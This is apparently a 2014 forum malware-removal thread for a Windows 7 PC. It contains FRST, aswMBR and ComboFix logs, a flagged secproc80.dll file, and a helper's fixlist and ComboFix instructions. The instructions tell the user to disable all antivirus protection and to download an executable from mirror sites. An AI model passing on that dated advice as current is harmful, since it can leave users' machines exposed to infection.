VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
==================== Restore Points =========================
02-11-2014 03:30:39 End of disinfection
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2014-10-30 20:17 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 10:24 - 2011-04-25 10:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 17:43 - 2012-03-19 17:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 08:58 - 2012-03-09 08:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 08:58 - 2012-03-09 08:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 11:20 - 2012-04-17 11:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 13:15 - 2012-03-28 13:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 17:03 - 2012-03-28 09:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2012-10-05 09:50 - 2013-06-28 12:12 - 01371648 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\ssj1mdu.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 13:16 - 2014-01-20 13:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 18:30 - 2012-05-03 16:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 18:30 - 2012-05-03 11:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 18:30 - 2012-04-20 18:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 18:30 - 2012-03-15 12:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 17:03 - 2012-03-28 09:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (11/01/2014 10:36:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 05:05:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ANT Agent.exe, version: 2.3.4.0, time stamp: 0x511ec340
Faulting module name: ANT Agent.exe, version: 2.3.4.0, time stamp: 0x511ec340
Exception code: 0xc0000417
Fault offset: 0x0002a427
Faulting process id: 0xe44
Faulting application start time: 0xANT Agent.exe0
Faulting application path: ANT Agent.exe1
Faulting module path: ANT Agent.exe2
Report Id: ANT Agent.exe3
Error: (11/01/2014 05:04:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 04:14:52 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/31/2014 08:44:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: ResolveSimultaneousProbe: 00000000018D7EA0 Our Record 3 lost: 00366AD0 4 Ryan-PC.local. Addr 192.168.200.26
System errors:
=============
Error: (11/02/2014 09:55:43 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
Error: (11/02/2014 09:34:04 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/02/2014 03:20:26 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
Error: (11/02/2014 03:14:06 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/01/2014 10:36:25 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/01/2014 05:03:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The iPod Service service terminated unexpectedly. It has done this 1 time(s).
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) ME Service service terminated unexpectedly. It has done this 1 time(s).
Error: (11/01/2014 05:01:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA Update Service Daemon service terminated unexpectedly. It has done this 1 time(s).
Microsoft Office Sessions:
=========================
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
Error: (11/02/2014 03:15:25 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
Error: (11/01/2014 10:36:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 05:05:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: ANT Agent.exe2.3.4.0511ec340ANT Agent.exe2.3.4.0511ec340c00004170002a427e4401cff61fd73c5c8bC:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exeC:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe2283649d-6213-11e4-8718-006b9e00c96d
Error: (11/01/2014 05:04:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/01/2014 04:14:52 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestc:\program files (x86)\ESET\eset online scanner\ESETSmartInstaller.exe
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/31/2014 08:44:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/31/2014 08:44:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: ResolveSimultaneousProbe: 00000000018D7EA0 Our Record 3 lost: 00366AD0 4 Ryan-PC.local. Addr 192.168.200.26
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 42%
Total physical RAM: 8085.95 MB
Available physical RAM: 4674.45 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 11697.59 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:831.05 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
aswMBR version 1.0.1.2172 Copyright(c) 2014 AVAST Software
Run date: 2014-11-02 22:26:24
-----------------------------
22:26:24.834 OS Version: Windows x64 6.1.7601 Service Pack 1
22:26:24.834 Number of processors: 8 586 0x3A09
22:26:24.834 ComputerName: RYAN-PC UserName: Ryan
22:26:26.987 Initialize success
22:26:27.049 VM: initialized successfully
22:26:27.049 VM: Intel CPU BiosDisabled
22:26:27.127 supported disk I/O iaStor.sys
22:29:06.265 AVAST engine defs: 14110201
22:29:11.350 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0
22:29:11.350 Disk 0 Vendor: ST1000LM 2AR1 Size: 953869MB BusType: 8
22:29:11.506 Disk 0 MBR read successfully I/O
22:29:11.506 Disk 0 MBR scan
22:29:11.538 Disk 0 Windows 7 default MBR code
22:29:11.678 Disk 0 Partition 1 80 (A) 27 Hidden NTFS WinRE NTFS 600 MB offset 2048
22:29:11.694 Disk 0 default boot code
22:29:11.725 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 941267 MB offset 1230848
22:29:11.803 Disk 0 Partition 3 00 27 Hidden NTFS WinRE NTFS 12000 MB offset 1928945664
22:29:11.959 Disk 0 scanning C:\Windows\system32\drivers
22:29:26.919 Service scanning
22:29:55.483 Modules scanning
22:29:55.483 Disk 0 trace - called modules:
22:29:55.514 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys iaStor.sys hal.dll
22:29:55.530 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007aa6790]
22:29:55.530 3 CLASSPNP.SYS[fffff88000e4e43f] -> nt!IofCallDriver -> [0xfffffa80076c9750]
22:29:55.545 5 ACPI.sys[fffff88000f607a1] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-0[0xfffffa80076ca050]
22:29:56.793 AVAST engine scan C:\Windows
22:29:59.508 AVAST engine scan C:\Windows\system32
22:34:00.014 AVAST engine scan C:\Windows\system32\drivers
22:34:16.598 AVAST engine scan C:\Users\Ryan
22:43:23.141 File: C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll **INFECTED** Win32:Malware-gen
22:47:09.217 AVAST engine scan C:\ProgramData
22:50:31.627 Disk 0 statistics 3962081/22/0 @ 2.48 MB/s
22:50:31.643 Scan finished successfully
22:52:57.737 Disk 0 MBR has been saved successfully to "C:\Users\Ryan\Desktop\MBR.dat"
22:52:57.768 The log file has been saved successfully to "C:\Users\Ryan\Desktop\aswMBR.txt"
Were you surfing the web when this happened?
Open Notepad. Please copy the contents of the quote box below. To do this, highlight the contents of the box, right-click on it and select Copy.
Paste this into the open Notepad. Save it to the Desktop as fixlist.txt.
NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
It needs to be saved next to the "Farbar Recovery Scan Tool". (If asked to overwrite the existing one, please allow.)
start
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~~~~~~~~
If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.
Emergency Backup Procedure - Tech Support Forum (http://www.techsupportforum.com/security-center/virus-trojan-spyware-help/306529-emergency-backup-procedure.html)
Please print out or make a copy in notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.
How to use ComboFix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix)
Download ComboFix from here:
Link 1 (http://www.bleepingcomputer.com/download/combofix/)
Link 2 (http://www.forospyware.com/sUBs/ComboFix.exe)
Link 3 (http://subs.geekstogo.com/ComboFix.exe)
Place ComboFix.exe on your Desktop <--Important
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with ComboFix.
* Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
You can get help on disabling your protection programs here (http://www.techsupportforum.com/security-center/virus-trojan-spyware-help/490111-how-disable-your-security-applications.html)
Double click on ComboFix.exe & follow the prompts.
You may be asked to install or update the Recovery Console (http://en.wikipedia.org/wiki/Recovery_Console) (Win XP only). If this happens, please allow it to do so (you will need to be connected to the internet for this).
Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may need to reboot your computer more than once to do its job; this is normal.
When finished, it shall produce a log for you. Post that log in your next reply.
Note:
Do not mouse-click ComboFix's window whilst it's running. That may cause it to stall.
Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion.", please restart the computer.
---------------------------------------------------------------------------------------------
Ensure your AntiVirus and AntiSpyware applications are re-enabled.
Note: ComboFix may reset a number of Internet Explorer's settings, including making it the default browser.
Note: Combofix prevents autorun of ALL CDs, floppies and USB devices to assist with malware removal & increase security.
---------------------------------------------------------------------------------------------
If there are Internet issues after running ComboFix:
Internet Explorer:
Tools Menu -> Internet Options -> Connections Tab -> LAN Settings -> uncheck "Use a proxy server" and check "Automatically detect settings". Also clear any proxy address and port. OK, Apply (only if applicable), OK.
Firefox:
Tools Menu -> Options... -> Advanced Tab -> Network Tab -> "Settings" under Connection. "No Proxy" should be selected, unless you have one set up yourself.
Chrome:
Select -> Tools menu -> then "Options", then go to "Change Proxy Settings", then "LAN Settings", then take out the check mark for "Use a proxy server for your LAN" if set, unless you set this up yourself.
Safari:
Launch Safari.
Go to the general settings menu.
Then go to Preferences / Advanced.
Then on the Proxies line click "Change Settings ...".
Click Internet Options, then click the Connections tab, then click Network Settings.
Disable (uncheck) the option to use a proxy server ...
~~~~~~~~~~~~~~~~~~~~~
Please post
Fixlog.txt
ComboFix.txt
ascot1340
2014-11-03, 22:34
Thanks for persevering with me! I'm not sure exactly when the problem came back, but I definitely used the internet yesterday. I wasn't visiting any dangerous or illicit websites or downloading any updates. I did notice that it changed my internet security settings again and I had to reset to the default level to be able to download the FRST 64 and aswMBR and again to download the ComboFix today. After running these tools, for now I'm not seeing any of the duplicate processes running in the task manager. I've posted the logs below.
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-03 15:04:54 Run:1
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll
End
*****************
Processes closed successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => Key deleted successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => Key deleted successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}" => Key deleted successfully.
C:\Windows => ":nlsPreferences" ADS removed successfully.
C:\Users\Ryan\AppData\LocalLow\{C94D6D52-0DF4-4CAD-A905-4D137389470C}\secproc80.dll => Moved successfully.
The system needed a reboot.
==== End of Fixlog ====
ComboFix 14-10-29.01 - Ryan 11/03/2014 15:13:10.1.8 - x64
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.8086.6026 [GMT -5:00]
Running from: c:\users\Ryan\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Enabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Enabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
ADS - Windows: deleted 0 bytes in 1 streams.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Ryan\Documents\~WRL0183.tmp
c:\users\Ryan\Documents\~WRL2671.tmp
c:\users\Ryan\Documents\~WRL3044.tmp
c:\users\Ryan\g2mdlhlpx.exe
.
.
((((((((((((((((((((((((( Files Created from 2014-10-03 to 2014-11-03 )))))))))))))))))))))))))))))))
.
.
2014-11-03 03:18 . 2014-11-03 20:04 -------- d-----w- C:\FRST
2014-11-02 20:54 . 2014-10-14 19:59 11627712 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{13025DE0-7F16-4226-9575-1E479453D749}\mpengine.dll
2014-11-02 03:51 . 2014-09-16 21:25 1188440 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{C68EA64F-7F05-45AD-AB11-C561A53CAF6F}\gapaengine.dll
2014-11-02 03:51 . 2014-10-14 19:59 11627712 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-10-31 01:53 . 2014-11-02 03:30 -------- d-----w- c:\windows\ERUNT
2014-10-30 05:28 . 2014-10-30 05:28 -------- d-----w- C:\RegBackup
2014-10-30 05:27 . 2014-10-30 05:27 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-10-15 20:38 . 2014-10-15 20:38 98216 ----a-w- c:\windows\SysWow64\WindowsAccessBridge-32.dll
2014-10-15 20:38 . 2014-10-15 20:38 -------- d-----w- c:\program files (x86)\Java
2014-10-14 20:19 . 2014-09-19 00:50 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-10-14 20:18 . 2014-09-18 02:00 3241472 ----a-w- c:\windows\system32\msi.dll
2014-10-14 20:18 . 2014-09-18 01:32 2363904 ----a-w- c:\windows\SysWow64\msi.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
